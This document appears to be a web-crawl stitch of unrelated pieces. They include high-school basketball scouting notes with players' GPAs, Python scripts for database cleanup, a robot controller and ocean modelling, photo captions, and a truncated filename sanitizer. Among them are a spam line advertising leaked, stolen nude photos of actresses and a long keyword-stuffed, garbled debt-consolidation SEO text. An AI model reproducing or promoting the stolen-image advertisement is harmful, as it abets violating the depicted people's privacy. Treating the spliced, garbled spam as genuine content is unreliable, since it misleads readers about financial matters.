Ladarius Anderson 6-2 G Provine HS (Jackson): 19 pts, 3 3’s, 2-2 ft, 5 ast vs Terry. He scored easily Saturday and shot the ball good. He was really impressive in the loss. He played top notch defense and worked the guy he was guarding hard. JUCO Coaches need to check him out this season.
JaQuondre “Dre” Bethany 6-0 160 lbs G Provine HS (Jackson) 2.7 GPA 16 ACT: 15 pts (10 in 2nd half), 9-10 ft vs Terry. Explosive. He created opportunities for his guys. He got into the lane and dished for shots or got to the free-throw line. He hit his free-throws at a high percentage. He played fast on defense. A great JUCO option and he keeps improving.
Anthony Ratliff Jr 6-3 G/F Jim Hill HS (Jackson): 12 pts, 7 reb, 2 blk vs Northwest Rankin. He didn’t play so well in the first half but played a big role in the second. All of his points, rebounds and blocks came in the second half and OT. A long lanky wing that is a great athlete.
Kolby Moore 6-4 165 lbs G/F Clinton HS (Clinton): 16 pts, 2 3’s vs Vicksburg. He showed that he can score from outside and mid range with some jumpers.
Xyshan Jenkins G/F Clinton HS (Clinton): 8 pts, 4 reb, 2 blk, 1 st vs Vicksburg. Great looking prospect. He showed he can defend and contest shots. He can rebound and get the ball up the court if he needs to. Keep an eye on him to develop.
Kevin Grimes 6-3 155 lbs G Bay Springs HS (Bay Springs) 3.5 GPA: 20 pts, 6 reb, 1 blk, 1 st vs Forest. The long and lanky guard has added several inches since last season. He is elusive and athletic. He can put up some points in a hurry and is hard to guard. He rebounds hard.
Damien Wheaton 6-7 200 lbs F/C Bay Springs HS (Bay Springs) 3.4 GPA: 2 pts, 10 reb, 2 ast vs Forest. Good size, athletic and long post. He is a defensive specialist. He contested shots at a high level and rebounded with ease.
Diwun Black 6-4 215 lbs G/F Forest HS (Forest): 13 pts, 5-7 ft, 5 reb, 1 blk vs Bay Springs. He plays with high energy. He is long and strong with adequate handles. The MS State football commit can clear the board and get up the court in a hurry. He scores easily after contact.
JaMarie Weathers 6-3 145 lbs G Leake County HS (Walnut Grove) 3.2 GPA: 12 pts, 5 reb, 4 blk, 4 st, 2 ast vs Leake Central. He has an elusive burst of speed and is great at getting into and attacking a zone. He can create opportunities. He played all out on defense. He was blocking shots and getting steals. He continues to improve at a good level.
Jamarious Williams 5-7 G Leake County HS (Walnut Grove): 12 pts, 3 3’s vs Leake Central. He is a great scoring option for Coach Bloodsaw. He shot the ball really well.
Earl Smith 6-4 155 lbs PG Lanier HS (Jackson): 21 pts, 7-9 ft, 9 reb vs Mendenhall. The lefty can stroke it with the best of them. His shot is so nice looking that you will be surprised when he misses. He can create his own shot anytime he wants to. He handles the ball smoothly. He rebounded at a high rate for a guard also on Saturday.
Vontrel Pringle 6-6 185 lbs F Meridian HS (Meridian): 10 pts, 2 3’s vs Callaway. He stepped out and showed his range by knocking down a couple 3’s.
Traemond Pittman 6-2 185 lbs PG Meridian HS (Meridian): 6 pts vs Callaway. A true point that can score. He ran the point and did what his team needed. A great prospect that Meridian has in the making.
Cam Drake 6-5 F Murrah HS (Jackson): 6 pts vs Raymond. He played a great game. He played with high energy on defense and rebounded hard. He’s one I’d like to see play again.
Jakorie Smith 6-5 200 lbs F Raymond HS (Utica): 8 pts vs Murrah. Jakorie played hard all night. He was a force around the basket as a rebounder. He scored down low. He made several nice passes from the high post.
Matthew “Matt” Mackey 6-1 170 lbs G Northwest Rankin HS (Flowood) 19 ACT: 21 pts (14 in 4th qtr and OT), 13-17 ft, 5 reb, 2 st, 1 ast vs Jim Hill. He played on cruise control until the fourth quarter and then the ball found its way to his hands. He played as a patient passer and waited for his moments to strike. The free-throw line was his friend. He was clutch when it counted.
Jaque’vias Tarvin 6-3 G Brandon HS (Brandon): 12 pts, 5 reb, 3 st vs Yazoo City. A nice looking young guard. He has great length and athleticism. He’s a good one to keep an eye on in the future.
Damarion Arrington 6-4 160 lbs G/F Wingfield HS (Jackson): 20 pts, 9-11 fg, 2 3’s, 10 reb, 2 st, 1 blk vs Riverside. Long and lanky with high potential. He showed a little outside and mid-range touch. He is really good off the 2nd and 3rd bounce. He plays fast on the defensive end.
Jabari Bowman 6-4 245 lbs F/C Warren Central HS (Vicksburg) 3.4 GPA: 4 pts, 2 reb vs Pearl. Nice up and coming big man. Good size body with soft hands and good footwork.
Antwan Hatten 6-3 185 lbs G Laurel HS (Laurel) 3.6 GPA: 8 pts, 2-2 ft vs Jackson Academy. Strong guard scored with ease in the first quarter. He finishes around the rim and draws contact.
Damon Haynes 6-1 SG Wingfield HS (Jackson): 3 pts vs Riverside. A nice looking prospect for Coach Gatlin.
Omarion Luss 5-11 150 lbs PG Clinton HS (Clinton) 4.0 GPA 19 ACT: 11 pts, 6 reb, 1 st vs Vicksburg. He played some great on ball defense. He was very aggravating to his man. He has very fast hands on defense and knocks a lot of passes down. He is very smart on offense. He used a variety of moves to get open shots. He played with maturity and composure.
Abraham Mckenzine 6-4 F Laurel HS (Laurel): Nice looking future Laurel stud. He has a frame of being like another Crosby or Drummond.
Reggie Clark 5-10 145 lbs G Holmes County Central HS (Tchula): 5 pts vs Madison Central. Coach Patrick is riding with his freshman guard this year and it’s for good reason. He had a rocky day Saturday shooting the ball but he can score in bunches when his shot is falling. He is a smooth play maker and will be a staple in the Jaguars offense for years to come.
Daeshun Ruffin 5-9 160 lbs PG Callaway HS (Jackson): 20 pts, 2 3’s, 2 reb, 5 ast and the game winning And1 vs Meridian. Real deal freshman came thru in the clutch. He can score on all levels. He has good handles and runs the Chargers team nicely. The sky is the limit for the Ruffin with a game winner under his belt now. Sorry about the first video being sideways. It was too good not to share and that was the best I could do with the recording.
Jamaal Esco 5-11 PG Murrah HS (Jackson): 12 pts, 3-4 ft vs Raymond. Here’s a freshman that I didn’t know anything about going into Saturday but he will be added to the list of highly touted ’21’s. He played like an upperclassman and handled himself with composure. He will be a good one to keep an eye on over the next several years.
Bay Springs Bulldogs: A bit of bad news for 2A this year. Bay Springs is deep, talented and good. Coach Mackey might be able to bring another title home this year and with only 2 seniors on the team, may be a couple more titles.
Madison Central Jaguars: Coach Speech has a really good young group coming along. He has size and talent on the way. A couple of the guys contributing this season are David Brown (6-5 ’19 F 3.2 GPA 17 pts), Justin Storm (6-6 ’20 lefty C 12 pts), Holden Grimes (6-5 ’20 G/F 7 pts), Logan Landis (6-5 ’20 C 3 pts), Sam Meadows (6-5 ’19 F 2 pts) and LaKevin Dixon (’21 G). Keep an eye for Madison Central to be special in the next few years with this much size and talent.
Meridian Wildcats: Coach Norman played several young players in the game. Some key young players he has coming up that played big minutes are Makeem Roberts (5-10 ’20 G 3.1 GPA), Azerious Ellis (5-8 ’20 G 3.2 GPA 2 pts) and Ke’Edrick Armstead (6-4 ’20 F 4.0 GPA 5 pts).
Murrah Mustangs: Coach Riley started 2 freshmen and played another quality minutes. The before mentioned Esco, Joseph Dupree (6-5 ’21 F/C 4 pts) and Jaylen Bolden (6-0 ’21 G 5 pts) will be a big part of the future at Murrah.
|
#!/usr/bin/python
# requisito: pip install PyMySQL
import pymysql.cursors
HOST = 'localhost'
USER = 'root'
PASSWORD = ''
DB = ''

# Query templates, filled in with the % operator.
SELECT_EXCLUIDOS = "SELECT %s FROM %s WHERE ind_excluido = 1 ORDER BY %s"

# BUG FIX: these two literals used to be *separate statements*, so the
# second line was a no-op expression and the template lacked the
# "in (...)" clause -- formatting it with three arguments then raised
# TypeError.  Parenthesizing concatenates them into one template.
REGISTROS_INCONSISTENTES = ("DELETE FROM %s WHERE %s "
                            "in (%s) AND ind_excluido = 0 ")

EXCLUI_REGISTRO = "DELETE FROM %s WHERE ind_excluido=1"

# Special case for norma_juridica: vinculo_norma_juridica references the
# norm through two columns (referente / referida).
NORMA_DEP = "DELETE FROM vinculo_norma_juridica WHERE cod_norma_referente in (%s) OR \
cod_norma_referida in (%s) AND ind_excluido = 0 "

mapa = {}  # mapa com tabela principal -> tabelas dependentes
mapa['tipo_autor'] = ['autor']
mapa['materia_legislativa'] = ['acomp_materia', 'autoria', 'despacho_inicial',
                               'documento_acessorio', 'expediente_materia',
                               'legislacao_citada', 'materia_assunto',
                               'numeracao', 'ordem_dia', 'parecer',
                               'proposicao', 'registro_votacao',
                               'relatoria', 'tramitacao']
mapa['norma_juridica'] = ['vinculo_norma_juridica']
mapa['comissao'] = ['composicao_comissao']
mapa['sessao_legislativa'] = ['composicao_mesa']
mapa['tipo_expediente'] = ['expediente_sessao_plenaria']

# Disabled dependency maps; note that __main__ still calls
# remove_tabelas() for 'autor' and 'parlamentar' even though they have no
# entry in mapa.
"""
mapa['autor'] = ['tipo_autor', 'partido', 'comissao', 'parlamentar']
mapa['parlamentar'] = ['autor', 'autoria', 'composicao_comissao',
                       'composicao_mesa', 'dependente', 'filiacao',
                       'mandato', 'mesa_sessao_plenaria', 'oradores',
                       'oradores_expediente', 'ordem_dia_presenca',
                       'registro_votacao_parlamentar', 'relatoria',
                       'sessao_plenaria_presenca', 'unidade_tramitacao']
"""
def get_ids_excluidos(cursor, query):
    """Run *query* and return the fetched primary keys as a flat list of
    strings (the DB API returns each row as a 1-tuple)."""
    cursor.execute(query)
    flat = []
    for row in cursor.fetchall():
        for value in row:
            flat.append(str(value))
    return flat
def remove_tabelas(cursor, tabela_principal, pk, query_dependentes=None):
    """Purge logically deleted rows (ind_excluido = 1) from
    *tabela_principal* and from its dependent tables.

    pk -- name of the main table's primary-key column.
    query_dependentes -- optional override template for the dependent-row
        cleanup (used for norma_juridica, whose dependents reference it
        through two columns); it receives the id list twice.
    """
    QUERY = SELECT_EXCLUIDOS % (pk, tabela_principal, pk)
    ids_excluidos = get_ids_excluidos(cursor, QUERY)
    print("\nRegistros da tabela '%s' com ind_excluido = 1: %s" %
          (tabela_principal.upper(), len(ids_excluidos)))
    # BUG FIX: use mapa.get() -- __main__ calls this for 'autor' and
    # 'parlamentar', which have no entry in mapa and used to raise
    # KeyError here.
    tabelas_dependentes = mapa.get(tabela_principal, [])
    # Remove rows in dependent tables that still have ind_excluido = 0 but
    # reference an excluded main-table row (inconsistent dependencies).
    if ids_excluidos:
        print("Dependencias inconsistentes")
        for tabela in tabelas_dependentes:
            QUERY_DEP = REGISTROS_INCONSISTENTES % (
                tabela, pk, ','.join(ids_excluidos))
            # Trata caso especifico de norma_juridica
            if query_dependentes:
                QUERY_DEP = query_dependentes % (','.join(ids_excluidos),
                                                 ','.join(ids_excluidos))
            print(tabela.upper(), cursor.execute(QUERY_DEP))
    # Finally drop every ind_excluido = 1 row from the dependent tables
    # and then from the main table itself, in that order.
    print("\n\nRegistros com ind_excluido = 1")
    for tabela in tabelas_dependentes + [tabela_principal]:
        QUERY = EXCLUI_REGISTRO % tabela
        print(tabela.upper(), cursor.execute(QUERY))
def remove_excluidas(cursor):
    """Print the list of tables in the database (debug helper).

    Despite its name this function only lists tables; it deletes nothing.
    """
    # BUG FIX: "SHOW_TABLES" is not valid MySQL syntax; the statement is
    # "SHOW TABLES".
    cursor.execute("SHOW TABLES")
    for row in cursor.fetchall():
        print(row)
def remove_proposicao_invalida(cursor):
    """Delete proposicao rows not linked to any materia/documento and
    return the execute() result (typically the affected-row count)."""
    sql = "DELETE FROM proposicao WHERE cod_mat_ou_doc is null"
    return cursor.execute(sql)
def remove_materia_assunto_invalida(cursor):
    """Delete materia_assunto rows pointing at the invalid assunto 0 and
    return the execute() result (typically the affected-row count)."""
    sql = "DELETE FROM materia_assunto WHERE cod_assunto = 0"
    return cursor.execute(sql)
def shotgun_remove(cursor):
    """Best-effort sweep: delete ind_excluido = 1 rows from every table.

    Iterates every table name ("SHOW TABLES") and issues a DELETE on each.
    Tables without an ind_excluido column simply fail; that failure is
    expected and deliberately ignored.

    Fix: the original bare ``except:`` also swallowed KeyboardInterrupt
    and SystemExit; it is narrowed to ``except Exception`` so the script
    can still be interrupted.
    """
    for tabela in get_ids_excluidos(cursor, "SHOW TABLES"):
        try:
            cursor.execute("DELETE FROM %s WHERE ind_excluido = 1" % tabela)
        except Exception:
            # Table has no ind_excluido column (or similar): skip it.
            pass
if __name__ == '__main__':
    # Entry point: connect to the legacy SAPL MySQL database and purge
    # logically-deleted rows (ind_excluido = 1) one table family at a
    # time, then drop known-invalid rows.
    connection = pymysql.connect(host=HOST,
                                 user=USER,
                                 password=PASSWORD,
                                 db=DB)
    cursor = connection.cursor()
    # TIPO AUTOR
    remove_tabelas(cursor, 'tipo_autor', 'tip_autor')
    # MATERIA LEGISLATIVA
    remove_tabelas(cursor, 'materia_legislativa', 'cod_materia')
    # NORMA JURIDICA (uses the special dependent-rows query NORMA_DEP)
    remove_tabelas(cursor, 'norma_juridica', 'cod_norma', NORMA_DEP)
    # COMISSAO
    remove_tabelas(cursor, 'comissao', 'cod_comissao')
    # SESSAO LEGISLATIVA
    remove_tabelas(cursor, 'sessao_legislativa', 'cod_sessao_leg')
    # EXPEDIENTE SESSAO
    remove_tabelas(cursor, 'tipo_expediente', 'cod_expediente')
    # AUTOR
    remove_tabelas(cursor, 'autor', 'cod_autor')
    # PARLAMENTAR
    remove_tabelas(cursor, 'parlamentar', 'cod_parlamentar')
    # PROPOSICAO
    remove_proposicao_invalida(cursor)
    # MATERIA_ASSUNTO
    remove_materia_assunto_invalida(cursor)
    # shotgun_remove(cursor)
    # NOTE(review): the connection is never committed or closed here --
    # verify the server/driver autocommit setting makes these DELETEs stick.
    cursor.close()
|
Tifft Nature Preserve is a 260+ acre nature refuge on the shores of Lake Erie. It was closed when i came through, but peaceful nonetheless.
The obligatory “What you can and can't do” sign. . .
. . . The visitor center across the pond. . .
. . .snow covered rocks. . .
|
# -*- coding: utf-8 -*-
#M3 -- Meka Robotics Robot Components
#Copyright (c) 2010 Meka Robotics
#Author: edsinger@mekabot.com (Aaron Edsinger)
#M3 is free software: you can redistribute it and/or modify
#it under the terms of the GNU Lesser General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#M3 is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU Lesser General Public License for more details.
#You should have received a copy of the GNU Lesser General Public License
#along with M3. If not, see <http://www.gnu.org/licenses/>.
#import roslib; roslib.load_manifest('kontrol')
#from kontrol.msg import Kontrol
import time
import rospy
from threading import Thread
from sensor_msgs.msg import Joy
import os
import subprocess
class M3KontrolThread(Thread):
    """Background thread bridging a Korg nanoKONTROL to ROS.

    Spawns the `korg_nanokontrol` ROS driver node as a subprocess,
    subscribes to its /joy topic, and caches the latest slider, knob and
    button values for synchronous polling (see M3Kontrol below).
    """
    def __init__(self,verbose=True):
        Thread.__init__(self)
        # Launch the nanoKONTROL ROS driver; the trailing '3' is a driver
        # argument -- presumably a device/layout id, TODO confirm.
        self.korg = subprocess.Popen(['rosrun', 'korg_nanokontrol', 'kontrol.py','3'])
        self.sliders = [0]*9   # latest slider values (9 sliders)
        self.knobs = [0]*9     # latest knob values (9 knobs)
        self.buttons = [0]*18  # latest button states (18 buttons)
        self.verbose=verbose
    def start(self):
        # Overridden so ROS is initialised in the caller's thread before
        # the spin loop starts running in this thread.
        if self.verbose:
            print 'Starting M3KontrolThread...'
        rospy.init_node('korg_nanokontrol',anonymous=True,disable_signals=True) #allow Ctrl-C to master process
        rospy.Subscriber("/joy",Joy,self.callback)
        Thread.start(self)
    def stop(self):
        # Kill the driver's child processes, then the driver itself, and
        # finally shut down rospy (which unblocks run()).
        os.system("pkill -P " + str(self.korg.pid))
        os.kill(self.korg.pid,9)
        rospy.signal_shutdown('Exiting')
    def run(self):
        rospy.spin()  # blocks until rospy.signal_shutdown() is called
    def callback(self,data):
        # /joy message layout: first 9 axes are sliders, next 9 are knobs.
        if self.verbose:
            print data
        self.sliders = data.axes[:len(self.sliders)]
        self.knobs = data.axes[len(self.sliders):len(self.sliders)+len(self.knobs)]
        self.buttons = data.buttons
        if self.verbose:
            print self.sliders
            print self.knobs
            print self.buttons
class M3Kontrol:
    """Synchronous facade over M3KontrolThread.

    Starts the background ROS listener on construction and exposes
    bounds-checked getters for the cached slider/knob/button values;
    any out-of-range index yields 0.
    """

    def __init__(self, verbose=False):
        self.kontrol_thread = M3KontrolThread(verbose)
        self.kontrol_thread.start()

    def get_slider(self, idx):
        """Latest value of slider *idx*, or 0 when idx is out of range."""
        values = self.kontrol_thread.sliders
        return values[idx] if 0 <= idx < len(values) else 0

    def get_knob(self, idx):
        """Latest value of knob *idx*, or 0 when idx is out of range."""
        values = self.kontrol_thread.knobs
        return values[idx] if 0 <= idx < len(values) else 0

    def get_button(self, idx):
        """Latest state of button *idx*, or 0 when idx is out of range."""
        values = self.kontrol_thread.buttons
        return values[idx] if 0 <= idx < len(values) else 0

    def stop(self):
        """Shut down the listener thread and its ROS driver subprocess."""
        self.kontrol_thread.stop()
|
Want see the sight new photo naked actresses? means you to address, we every week publish selfie stars and their Leaked, as well as the legs. We you find fotos stolen on the internet. We constantly improve update our content.
|
#!/usr/bin/python2.7
# encoding: utf-8
from __future__ import division
import numpy as np
import numexpr as ne
from pyseidon.utilities.miscellaneous import *
from pyseidon.utilities.BP_tools import *
import time
# Custom error
from pyseidon_error import PyseidonError
class FunctionsStationThreeD:
    """
    **'Utils3D' subset of Station class gathers useful functions for 3D runs**

    Holds references to a station FVCOM-style variable/grid/plot triple and
    computes depth, vertical shear, velocity norm and flow direction at a
    named or indexed station.
    """
    def __init__(self, variable, grid, plot, History, debug):
        #Inheritance
        self._debug = debug
        self._plot = plot
        #Create pointer to FVCOM class
        setattr(self, '_var', variable)
        setattr(self, '_grid', grid)
        setattr(self, '_History', History)

    def search_index(self, station):
        """Search for the station index.

        *station* may be an integer index (returned unchanged) or a
        station name (str/ndarray of characters), matched case- and
        whitespace-insensitively against self._grid.name.  Raises
        PyseidonError when the input type is wrong or no name matches.
        """
        if type(station)==int:
            index = station
        elif type(station).__name__ in ['str', 'ndarray']:
            station = "".join(station).strip().upper()
            for i in range(self._grid.nele):
                if station=="".join(self._grid.name[i]).strip().upper():
                    index=i
        else:
            raise PyseidonError("---Wrong station input---")
        # No assignment above means the name was not found.
        if not 'index' in locals():
            raise PyseidonError("---Wrong station input---")
        return index

    def depth(self, station, debug=False):
        """
        Compute depth at given point.

        Inputs:
          - station = either station index (integer) or name (string)

        Outputs:
          - dep = depth, 2D array (ntime, nlevel)

        Notes:
          - depth convention: 0 = free surface
          - index is used in case one knows already at which
            element depth is requested
        """
        debug = debug or self._debug
        if debug:
            print "Computing depth..."
            start = time.time()
        #Search for the station
        index = self.search_index(station)
        #Compute depth: total water column (elevation + bathymetry) scaled
        #by the sigma-layer coordinates of this station.
        h = self._grid.h[index]
        el = self._var.el[:,index]
        zeta = el + h
        siglay = self._grid.siglay[:,index]
        dep = zeta[:, np.newaxis]*siglay[np.newaxis, :]
        if debug:
            end = time.time()
            print "Computation time in (s): ", (end - start)
        return np.squeeze(dep)

    def verti_shear(self, station, t_start=[], t_end=[], time_ind=[],
                    bot_lvl=[], top_lvl=[], graph=True, debug=False):
        """
        Compute vertical shear at any given location.

        Inputs:
          - station = either station index (integer) or name (string)

        Outputs:
          - dveldz = vertical shear (1/s), 2D array (time, nlevel - 1)

        Options:
          - t_start = start time, as string ('yyyy-mm-ddThh:mm:ss'),
            or time index as an integer
          - t_end = end time, as a string ('yyyy-mm-ddThh:mm:ss'),
            or time index as an integer
          - time_ind = time indices to work in, list of integers
          - bot_lvl = index of the bottom level to consider, integer
          - top_lvl = index of the top level to consider, integer
          - graph = plots graph if True

        *Notes*
          - use time_ind or t_start and t_end, not both
        """
        debug = debug or self._debug
        if debug:
            print 'Computing vertical shear at point...'
        # Find time interval to work in
        # NOTE(review): `datetime` and `time_to_index` are not imported in
        # this module's visible imports -- presumably provided by the
        # star-imports from pyseidon.utilities; confirm.
        argtime = []
        if not time_ind==[]:
            argtime = time_ind
        elif not t_start==[]:
            if type(t_start)==str:
                start = datetime.datetime.strptime(t_start, '%Y-%m-%d %H:%M:%S')
                end = datetime.datetime.strptime(t_end, '%Y-%m-%d %H:%M:%S')
                argtime = time_to_index(start, end, self._var.julianTime[:], debug=debug)
            else:
                argtime = np.arange(t_start, t_end)
        #Search for the station
        index = self.search_index(station)
        #Compute depth
        dep = self.depth(station, debug=debug)
        if not argtime==[]:
            depth = dep[argtime,:]
        else:
            depth = dep
        #Sigma levels to consider (default: whole water column)
        if top_lvl==[]:
            top_lvl = self._grid.nlevel - 1
        if bot_lvl==[]:
            bot_lvl = 0
        sLvl = range(bot_lvl, top_lvl+1)
        #Extracting velocity at point
        if not argtime==[]:
            U = self._var.u[argtime,:,index]
            V = self._var.v[argtime,:,index]
        else:
            U = self._var.u[:,:,index]
            V = self._var.v[:,:,index]
        norm = ne.evaluate('sqrt(U**2 + V**2)').squeeze()
        # Compute shear: finite difference of speed between adjacent levels
        dz = depth[:,sLvl[1:]] - depth[:,sLvl[:-1]]
        dvel = norm[:,sLvl[1:]] - norm[:,sLvl[:-1]]
        dveldz = dvel / dz
        if debug:
            print '...Passed'
        #Plot mean values
        if graph:
            mean_depth = np.mean((depth[:,sLvl[1:]]
                                + depth[:,sLvl[:-1]]) / 2.0, 0)
            mean_dveldz = np.mean(dveldz,0)
            error = np.std(dveldz,axis=0)
            self._plot.plot_xy(mean_dveldz, mean_depth, xerror=error[:],
                               title='Shear profile ',
                               xLabel='Shear (1/s) ', yLabel='Depth (m) ')
        return np.squeeze(dveldz)

    def velo_norm(self, station, t_start=[], t_end=[], time_ind=[],
                  graph=True, debug=False):
        """
        Compute the velocity norm at any given location.

        Inputs:
          - station = either station index (integer) or name (string)

        Outputs:
          - velo_norm = velocity norm, 2D array (time, level)

        Options:
          - t_start = start time, as string ('yyyy-mm-ddThh:mm:ss'),
            or time index as an integer
          - t_end = end time, as a string ('yyyy-mm-ddThh:mm:ss'),
            or time index as an integer
          - time_ind = time indices to work in, list of integers
          - graph = plots vertical profile averaged over time if True

        *Notes*
          - use time_ind or t_start and t_end, not both
        """
        debug = debug or self._debug
        if debug:
            print 'Computing velocity norm at point...'
        # Find time interval to work in
        argtime = []
        if not time_ind==[]:
            argtime = time_ind
        elif not t_start==[]:
            if type(t_start)==str:
                start = datetime.datetime.strptime(t_start, '%Y-%m-%d %H:%M:%S')
                end = datetime.datetime.strptime(t_end, '%Y-%m-%d %H:%M:%S')
                argtime = time_to_index(start, end, self._var.julianTime[:], debug=debug)
            else:
                argtime = np.arange(t_start, t_end)
        #Search for the station
        index = self.search_index(station)
        #Computing velocity norm; falls back to the horizontal-only norm
        #when the run carries no vertical velocity component `w`.
        try:
            if not argtime==[]:
                U = self._var.u[argtime, :, index]
                V = self._var.v[argtime, :, index]
                W = self._var.w[argtime, :, index]
                velo_norm = ne.evaluate('sqrt(U**2 + V**2 + W**2)').squeeze()
            else:
                U = self._var.u[:, :, index]
                V = self._var.v[:, :, index]
                W = self._var.w[:, :, index]
                velo_norm = ne.evaluate('sqrt(U**2 + V**2 + W**2)').squeeze()
        except AttributeError:
            if not argtime==[]:
                U = self._var.u[argtime, :, index]
                V = self._var.v[argtime, :, index]
                velo_norm = ne.evaluate('sqrt(U**2 + V**2)').squeeze()
            else:
                U = self._var.u[:, :, index]
                V = self._var.v[:, :, index]
                velo_norm = ne.evaluate('sqrt(U**2 + V**2)').squeeze()
        if debug:
            print '...passed'
        #Plot mean values
        if graph:
            depth = np.mean(self.depth(station),axis=0)
            vel = np.mean(velo_norm,axis=0)
            error = np.std(velo_norm,axis=0)
            self._plot.plot_xy(vel, depth, xerror=error[:],
                               title='Velocity norm profile ',
                               xLabel='Velocity (m/s) ', yLabel='Depth (m) ')
        return velo_norm

    def flow_dir(self, station, t_start=[], t_end=[], time_ind=[],
                 vertical=True, debug=False):
        """
        Compute flow directions and associated norm at any given location.

        Inputs:
          - station = either station index (integer) or name (string)

        Outputs:
          - flowDir = flowDir at (pt_lon, pt_lat), 2D array (ntime, nlevel)

        Options:
          - t_start = start time, as string ('yyyy-mm-ddThh:mm:ss'),
            or time index as an integer
          - t_end = end time, as a string ('yyyy-mm-ddThh:mm:ss'),
            or time index as an integer
          - time_ind = time indices to work in, list of integers
          - vertical = True, compute flowDir for each vertical level

        *Notes*
          - directions between -180 and 180 deg., i.e. 0=East, 90=North,
            +/-180=West, -90=South
          - use time_ind or t_start and t_end, not both
        """
        debug = debug or self._debug
        if debug:
            print 'Computing flow directions at point...'
        #Search for the station
        index = self.search_index(station)
        # Find time interval to work in
        argtime = []
        if not time_ind==[]:
            argtime = time_ind
        elif not t_start==[]:
            if type(t_start)==str:
                start = datetime.datetime.strptime(t_start, '%Y-%m-%d %H:%M:%S')
                end = datetime.datetime.strptime(t_end, '%Y-%m-%d %H:%M:%S')
                argtime = time_to_index(start, end, self._var.julianTime[:], debug=debug)
            else:
                argtime = np.arange(t_start, t_end)
        #Choose the right pair of velocity components
        # NOTE(review): u and v are only assigned inside this branch; when
        # neither time_ind nor t_start is given (argtime == []), the
        # np.arctan2 call below raises NameError/UnboundLocalError.
        # Compare with verti_shear/velo_norm, which both have an else
        # branch for the full time range -- likely a lost else here.
        if not argtime==[]:
            if self._var._3D and vertical:
                u = self._var.u[argtime,:,index]
                v = self._var.v[argtime,:,index]
            else:
                u = self._var.ua[argtime,index]
                v = self._var.va[argtime,index]
        #Compute directions
        if debug: print 'Computing arctan2 and norm...'
        dirFlow = np.rad2deg(np.arctan2(v,u))
        if debug:
            print '...Passed'
        return np.squeeze(dirFlow)
#TR_comments: templates
# def whatever(self, debug=False):
# if debug or self._debug:
# print 'Start whatever...'
#
# if debug or self._debug:
# print '...Passed'
|
If you in Eufaula Alabama have been wary of taking a keen look in Eufaula at your credit report then we are glad to inform you in Eufaula that there is no reason to be afraid in Eufaula. After all, it is only bills reporting of what you already know in Eufaula all about. It should not come as a surprise in Eufaula AL that you either have earned a great credit score in Eufaula and rating or definitely have earned a negative one! A credit card debt counseling program will clear things in Eufaula you if you have forgotten what that credit score in Eufaula really happens to be these days in Eufaula. From time to time, there is a lapse in Eufaula of selective memories of this we are well aware in Eufaula Alabama of and sympathize with as well in Eufaula.
With every financial growth, individual expenditure fires over the top in Eufaula. With every crisis, arrives an upswing in Eufaula of numerous brand new consolidate debt in Eufaula providers. Throughout a rate of growth in Eufaula, banks may give unguaranteed credit readily in Eufaula and become pleased to provide cash advance lending to actually just about anyone in Eufaula. This particular shot associated with credit cards implies that credit card debt settlement customers will probably be pleased spenders in Eufaula Alabama as well as nourish any economic climate in Eufaula by using money they do not really possess in Eufaula. Quite simply, this really is money in Eufaula with absolutely no actual worth powering this in Eufaula.
Are you in Eufaula sitting there all comfortable in your home in Eufaula, happily tapping away on the laptop oblivious to the debts damage in Eufaula that is being inflicted upon one in Eufaula of the most important money barometers' in Eufaula in your life? A glimpse at your free debt report in Eufaula today and get a credit card consolidating will set you back in the right frame in Eufaula Alabama of mind in and point you in the right direction in Eufaula for any future big ticket in Eufaula purchases and plans. The ability in Eufaula to fund a big project such as a college education in Eufaula for your child is a very important part in Eufaula of being all grown up! If this in Eufaula has hit you in the head in and heart in Eufaula then check out consolidate debt in Eufaula services today.
When the growth in Eufaula has ended and individuals remain along in Eufaula with several charge cards to repay in Eufaula, after that anxiousness increases, telephone calls in Eufaula AL throughout supper arrive non stop, and also credit card counseling companies begin their own marketing in Eufaula. What's missing out of the majority of individuals in Eufaula Alabama thoughts is they may also take advantage in Eufaula of consumer consolidate debt in Eufaula.
In contrast to credit card debt consolidating, consumer credit counseling providers in Eufaula don't cause you to buy their goods in Eufaula or even move the charge card amounts to these people in Eufaula Alabama. A good number of operate in Eufaula out of an charitable perspective and may work in Eufaula nicely along with consolidate debt in Eufaula providers. They'll educate you on methods in Eufaula and provide you with the training in Eufaula AL you require to see how in Eufaula better to repay all of our financial online cash advance loans within the quickest fashion in Eufaula.
Do you dread the daily visit in Eufaula of the mailman? Have you turned the ringer in Eufaula on your phone off because of the constant calls in Eufaula Alabama? Are you deep in debt and don't know what to do in Eufaula? Don't worry — consolidate debt in Eufaula is your best answer.
Almost every person in Eufaula has gotten into some kind of credit cards trouble at some point in their lives in Eufaula AL. That doesn't define you, it is how you get out of it in Eufaula. That is why credit card counseling is so good for you. In consolidate debt in Eufaula you are still paying off what you rightly owe in Eufaula, but at a slower pace. It's not like bankruptcy in Eufaula were you lose everything and it's on your record for years in Eufaula.
There are so many credit card counseling companies that offer credit card debt settlement out there now. Make sure you understand how each debt management service is run and what their credit card counseling terms are before you agree. Most will take all your credit cards information and send letters to the places in Eufaula you owe after you have entered this debt settlement program and get them to agree to a lower bills payment. Then they will give you a credit card consolidation payment amount that you pay when you consolidate debt in Eufaula once a month with debt consolidating. Once you enter into a debt relief program and the consolidate debt in Eufaula company notifies the creditors in Eufaula that you have enter the credit card debt management program, they are suppose to stop calling you.
Not only does it make the consolidate debt in Eufaula payments smaller and more manageable in Eufaula Alabama, but it gives you some peace and less stress from the credit cards phone calls. Credit consolidating Eufaula Alabama is the best way to get out of debt, no matter how small or large the debt is in Eufaula. If you are having trouble keeping up in Eufaula with your bills payments, then you need to talk to consolidate debt in Eufaula company today.
|
from __future__ import unicode_literals
import sys
import unicodedata
import warnings
class ReplacementLengthWarning(UserWarning):
    # Signals that a multi-character replacement string may defeat the
    # file-system length-limit guarantees of sanitize_path_fragment.
    pass
# Report the warning on every occurrence (the default action would show
# it only once per location).
warnings.filterwarnings("always", category=ReplacementLengthWarning)
def _are_unicode(unicode_args=[]):
if sys.version_info[0] == 2:
return all((type(arg) == unicode) for arg in unicode_args)
# Assume Python 3
return all((type(arg) == str) for arg in unicode_args)
def sanitize_path_fragment(
        original_fragment,
        filename_extension = '', # when you do want a filename extension, there is no need to include the leading dot.
        target_file_systems = {
            'btrfs', 'ext', 'ext2', 'ext3', 'ext3cow', 'ext4', 'exfat', 'fat32',
